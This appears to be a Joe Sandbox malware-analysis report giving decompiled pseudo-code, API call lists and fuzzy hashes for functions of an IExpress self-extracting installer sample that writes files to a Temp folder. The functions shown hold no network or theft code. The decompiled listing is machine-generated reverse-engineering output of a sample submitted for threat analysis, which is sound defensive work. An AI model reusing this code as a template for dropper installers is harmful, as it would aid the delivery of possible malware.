                                                                      						if(E011D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                      						_v28 = _t68;
                                                                      						if(_t68 == 0) {
                                                                      							_t99 = _v16;
                                                                      							_t70 = _v8 + _t99;
                                                                      							_t93 = _v24;
                                                                      							_t87 = _v20;
                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                      							if(_t103 != 0) {
                                                                      								_t73 = GlobalLock(_t103);
                                                                      								_v36 = _t73;
                                                                      								if(_t73 != 0) {
                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                      										L15:
                                                                      										GlobalUnlock(_t103);
                                                                      										_t99 = _v16;
                                                                      										L18:
                                                                      										_t87 = _t87 + 1;
                                                                      										_t62 = _v8 + 0x3c;
                                                                      										_v20 = _t87;
                                                                      										_v8 = _v8 + 0x3c;
                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                      											continue;
                                                                      										} else {
                                                                      											goto L19;
                                                                      										}
                                                                      									} else {
                                                                      										_t79 = _v44;
                                                                      										_t88 = _t106;
                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                      										_t101 = _v28;
                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                      										_t97 = _v48;
                                                                      										_v36 = _t83;
                                                                      										_t109 = _t83;
                                                                      										do {
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E011D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E011D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                      											_t109 = _t109 + 0x18;
                                                                      											_t88 = _t88 + 4;
                                                                      										} while (_t88 < 8);
                                                                      										_t87 = _v20;
                                                                      										_t106 = 0;
                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                      												GlobalUnlock(_t103);
                                                                      											} else {
                                                                      												goto L15;
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      				}
                                                                      				L20:
                                                                      				 *_a8 = _t87;
                                                                      				if(_t103 != 0) {
                                                                      					GlobalFree(_t103);
                                                                      				}
                                                                      				return _t106;
                                                                      			}


































                                                                      APIs
                                                                      • GlobalFree.KERNEL32 ref: 011D2A6F
                                                                        • Part of subcall function 011D2773: CharUpperA.USER32(DC3102D5,00000000,00000000,00000000), ref: 011D27A8
                                                                        • Part of subcall function 011D2773: CharNextA.USER32(0000054D), ref: 011D27B5
                                                                        • Part of subcall function 011D2773: CharNextA.USER32(00000000), ref: 011D27BC
                                                                        • Part of subcall function 011D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2829
                                                                        • Part of subcall function 011D2773: RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2852
                                                                        • Part of subcall function 011D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2870
                                                                        • Part of subcall function 011D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D28A0
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,011D3938,?,?,?,?,-00000005), ref: 011D2958
                                                                      • GlobalLock.KERNEL32 ref: 011D2969
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,011D3938,?,?,?,?,-00000005,?), ref: 011D2A21
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 011D2A81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3949799724-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D47E0(intOrPtr* __ecx) {
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t9;
                                                                      				void* _t11;
                                                                      				void* _t19;
                                                                      				intOrPtr* _t22;
                                                                      				void _t24;
                                                                      				struct HWND__* _t25;
                                                                      				struct HWND__* _t26;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t33 = __ecx;
                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                      				if(_t34 != 0) {
                                                                      					_t22 = _t33;
                                                                      					_t27 = _t22 + 1;
                                                                      					do {
                                                                      						_t6 =  *_t22;
                                                                      						_t22 = _t22 + 1;
                                                                      					} while (_t6 != 0);
                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                      					 *_t34 = _t24;
                                                                      					if(_t24 != 0) {
                                                                      						_t28 = _t33;
                                                                      						_t19 = _t28 + 1;
                                                                      						do {
                                                                      							_t9 =  *_t28;
                                                                      							_t28 = _t28 + 1;
                                                                      						} while (_t9 != 0);
                                                                      						E011D1680(_t24, _t28 - _t19 + 1, _t33);
                                                                      						_t11 =  *0x11d91e0; // 0xec7270
                                                                      						 *(_t34 + 4) = _t11;
                                                                      						 *0x11d91e0 = _t34;
                                                                      						return 1;
                                                                      					}
                                                                      					_t25 =  *0x11d8584; // 0x0
                                                                      					E011D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                      					LocalFree(_t34);
                                                                      					L2:
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 =  *0x11d8584; // 0x0
                                                                      				E011D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                      				goto L2;
                                                                      			}

                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,011D4E6F), ref: 011D47EA
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 011D4823
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 011D4847
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$pr
                                                                      • API String ID: 359063898-931104669
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 32%
                                                                      			E011D4169(void* __eflags) {
                                                                      				int _t18;
                                                                      				void* _t21;
                                                                      
                                                                      				_t20 = E011D468F("FINISHMSG", 0, 0);
                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                      				if(_t21 != 0) {
                                                                      					if(E011D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                      							L7:
                                                                      							return LocalFree(_t21);
                                                                      						}
                                                                      						_push(0);
                                                                      						_push(0x40);
                                                                      						_push(0);
                                                                      						_push(_t21);
                                                                      						_t18 = 0x3e9;
                                                                      						L6:
                                                                      						E011D44B9(0, _t18);
                                                                      						goto L7;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push(0x10);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_t18 = 0x4b1;
                                                                      					goto L6;
                                                                      				}
                                                                      				return E011D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,011D30B4), ref: 011D4189
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,011D30B4), ref: 011D41E7
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$FINISHMSG
                                                                      • API String ID: 3507850446-3091758298
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v520;
                                                                      				void* __esi;
                                                                      				signed int _t11;
                                                                      				void* _t14;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      				struct HWND__* _t34;
                                                                      				signed int _t35;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t27 = __ebx;
                                                                      				_t11 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t11 ^ _t35;
                                                                      				_t34 = _a4;
                                                                      				_t14 = _a8 - 0x110;
                                                                      				if(_t14 == 0) {
                                                                      					_t32 = GetDesktopWindow();
                                                                      					E011D43D0(_t34, _t15);
                                                                      					_v520 = 0;
                                                                      					LoadStringA( *0x11d9a3c, _a16,  &_v520, 0x200);
                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                      					MessageBeep(0xffffffff);
                                                                      					goto L6;
                                                                      				} else {
                                                                      					if(_t14 != 1) {
                                                                      						L4:
                                                                      						_t23 = 0;
                                                                      					} else {
                                                                      						_t32 = _a12;
                                                                      						if(_t32 - 0x83d > 1) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							EndDialog(_t34, _t32);
                                                                      							L6:
                                                                      							_t23 = 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                      			}

                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 011D1A18
                                                                      • GetDesktopWindow.USER32 ref: 011D1A24
                                                                      • LoadStringA.USER32(?,?,00000200), ref: 011D1A4F
                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 011D1A62
                                                                      • MessageBeep.USER32(000000FF), ref: 011D1A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E011D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				long _v272;
                                                                      				void* _v276;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t15;
                                                                      				long _t28;
                                                                      				struct _OVERLAPPED* _t37;
                                                                      				void* _t39;
                                                                      				signed int _t40;
                                                                      
                                                                      				_t15 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t15 ^ _t40;
                                                                      				_v272 = _v272 & 0x00000000;
                                                                      				_push(__ecx);
                                                                      				_v276 = _a16;
                                                                      				_t37 = 1;
                                                                      				E011D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      				E011D658A( &_v268, 0x104, _a12);
                                                                      				_t28 = 0;
                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                      				if(_t39 != 0xffffffff) {
                                                                      					_t28 = _a4;
                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                      						 *0x11d9124 = 0x80070052;
                                                                      						_t37 = 0;
                                                                      					}
                                                                      					CloseHandle(_t39);
                                                                      				} else {
                                                                      					 *0x11d9124 = 0x80070052;
                                                                      					_t37 = 0;
                                                                      				}
                                                                      				return E011D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                      			}
















                                                                      APIs
                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D642D
                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D645B
                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 011D647A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D63EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleWrite
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1065093856-2312194364
                                                                      • Opcode ID: 1cba17c8596892f8b92c95a9f03c851652e0bc732bbcf4b7b5f99ab1799f4cd9
                                                                      • Instruction ID: 7af8c3a840aed59a8a269bd015a092064f4c2a9b9f27dc919972f4248689afd2
                                                                      • Opcode Fuzzy Hash: 1cba17c8596892f8b92c95a9f03c851652e0bc732bbcf4b7b5f99ab1799f4cd9
                                                                      • Instruction Fuzzy Hash: 352102B1A0121CABDB28DF25DCC5FEB7768EB45314F0001A9E594A3280CBB46DC4CFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E011D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                      				struct HRSRC__* _t6;
                                                                      				void* _t21;
                                                                      				struct HINSTANCE__* _t23;
                                                                      				int _t24;
                                                                      
                                                                      				_t23 =  *0x11d9a3c; // 0x11d0000
                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                      				if(_t6 == 0) {
                                                                      					L6:
                                                                      					E011D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                      					_t24 = _a16;
                                                                      				} else {
                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					} else {
                                                                      						if(_a12 != 0) {
                                                                      							_push(_a12);
                                                                      						} else {
                                                                      							_push(0);
                                                                      						}
                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                      						FreeResource(_t21);
                                                                      						if(_t24 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t24;
                                                                      			}








                                                                      APIs
                                                                      • FindResourceA.KERNEL32(011D0000,000007D6,00000005), ref: 011D652A
                                                                      • LoadResource.KERNEL32(011D0000,00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 011D6538
                                                                      • DialogBoxIndirectParamA.USER32(011D0000,00000000,00000547,011D19E0,00000000), ref: 011D6557
                                                                      • FreeResource.KERNEL32(00000000,?,?,011D2EE8,00000000,011D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 011D6560
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: 2267f82c27f10b85e0344a0d88d57cf7587881f8dc9ce1666acbd03978781fb6
                                                                      • Instruction ID: c6baa9121389e1ee66c8dba581e9e1c4ee8814ce195f2e38b225a32777a288f0
                                                                      • Opcode Fuzzy Hash: 2267f82c27f10b85e0344a0d88d57cf7587881f8dc9ce1666acbd03978781fb6
                                                                      • Instruction Fuzzy Hash: 0D01D672102619BBDF299EA9AC48DBB7B6CEF857A1B410125FE2093144D7719D90C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3680(void* __ecx) {
                                                                      				void* _v8;
                                                                      				struct tagMSG _v36;
                                                                      				int _t8;
                                                                      				struct HWND__* _t16;
                                                                      
                                                                      				_v8 = __ecx;
                                                                      				_t16 = 0;
                                                                      				while(1) {
                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                      					if(_t8 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                      						continue;
                                                                      					} else {
                                                                      						do {
                                                                      							if(_v36.message != 0x12) {
                                                                      								DispatchMessageA( &_v36);
                                                                      							} else {
                                                                      								_t16 = 1;
                                                                      							}
                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                      						} while (_t8 != 0);
                                                                      						if(_t16 == 0) {
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				return _t8;
                                                                      			}








                                                                      APIs
                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 011D369F
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36B2
                                                                      • DispatchMessageA.USER32(?), ref: 011D36CB
                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 011D36DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                      • String ID:
                                                                      • API String ID: 2776232527-0
                                                                      • Opcode ID: 9aac7dcec7596964128ebf8f28c77fa6551d51289b92ef4ed9fcd0a2d952060a
                                                                      • Instruction ID: 345e87135eda8a33976c65ee19ae1c51441fea87740507262602313098ab82f5
                                                                      • Opcode Fuzzy Hash: 9aac7dcec7596964128ebf8f28c77fa6551d51289b92ef4ed9fcd0a2d952060a
                                                                      • Instruction Fuzzy Hash: 690167B291125577DB348AAA6C4CEEB7A7CFBC6B10F040129FA25E3184D661C684C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E011D65E8(char* __ecx) {
                                                                      				char _t3;
                                                                      				char _t10;
                                                                      				char* _t12;
                                                                      				char* _t14;
                                                                      				char* _t15;
                                                                      				CHAR* _t16;
                                                                      
                                                                      				_t12 = __ecx;
                                                                      				_t15 = __ecx;
                                                                      				_t14 =  &(__ecx[1]);
                                                                      				_t10 = 0;
                                                                      				do {
                                                                      					_t3 =  *_t12;
                                                                      					_t12 =  &(_t12[1]);
                                                                      				} while (_t3 != 0);
                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                      				while(1) {
                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                      					if(_t16 <= _t15) {
                                                                      						break;
                                                                      					}
                                                                      					if( *_t16 == 0x5c) {
                                                                      						L7:
                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                      							_t16 = CharNextA(_t16);
                                                                      						}
                                                                      						 *_t16 = _t10;
                                                                      						_t10 = 1;
                                                                      					} else {
                                                                      						_push(_t16);
                                                                      						continue;
                                                                      					}
                                                                      					L11:
                                                                      					return _t10;
                                                                      				}
                                                                      				if( *_t16 == 0x5c) {
                                                                      					goto L7;
                                                                      				}
                                                                      				goto L11;
                                                                      			}










                                                                      APIs
                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,011D2B33), ref: 011D6602
                                                                      • CharPrevA.USER32(?,00000000), ref: 011D6612
                                                                      • CharPrevA.USER32(?,00000000), ref: 011D6629
                                                                      • CharNextA.USER32(00000000), ref: 011D6635
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Prev$Next
                                                                      • String ID:
                                                                      • API String ID: 3260447230-0
                                                                      • Opcode ID: 75cb88f93ae635d2a91cdc94dcbc944b048a1b06491b385a1ff839ac70db6503
                                                                      • Instruction ID: c538871c46ea703c81600805465a60ca658c771866dda20494495986356b013e
                                                                      • Opcode Fuzzy Hash: 75cb88f93ae635d2a91cdc94dcbc944b048a1b06491b385a1ff839ac70db6503
                                                                      • Instruction Fuzzy Hash: 3FF028320061606EE73B4E3C9C888BBBF9CCF8B19471901BFE5A183001D7150A86C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D69B0() {
                                                                      				intOrPtr* _t4;
                                                                      				intOrPtr* _t5;
                                                                      				void* _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      
                                                                      				 *0x11d81f8 = E011D6C70();
                                                                      				__set_app_type(E011D6FBE(2));
                                                                      				 *0x11d88a4 =  *0x11d88a4 | 0xffffffff;
                                                                      				 *0x11d88a8 =  *0x11d88a8 | 0xffffffff;
                                                                      				_t4 = __p__fmode();
                                                                      				_t11 =  *0x11d8528; // 0x0
                                                                      				 *_t4 = _t11;
                                                                      				_t5 = __p__commode();
                                                                      				_t12 =  *0x11d851c; // 0x0
                                                                      				 *_t5 = _t12;
                                                                      				_t6 = E011D7000();
                                                                      				if( *0x11d8000 == 0) {
                                                                      					__setusermatherr(E011D7000);
                                                                      				}
                                                                      				E011D71EF(_t6);
                                                                      				return 0;
                                                                      			}









                                                                      APIs
                                                                        • Part of subcall function 011D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 011D6FC5
                                                                      • __set_app_type.MSVCRT ref: 011D69C2
                                                                      • __p__fmode.MSVCRT ref: 011D69D8
                                                                      • __p__commode.MSVCRT ref: 011D69E6
                                                                      • __setusermatherr.MSVCRT ref: 011D6A07
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                      • String ID:
                                                                      • API String ID: 1632413811-0
                                                                      • Opcode ID: 03beb55f843d125f16ebe8b07d097d53592d5bef2518dcd612903b9c3548e362
                                                                      • Instruction ID: 07b051164180db300c43588988e7dc2e3b73de53cca23172686ea59d8c1a55c5
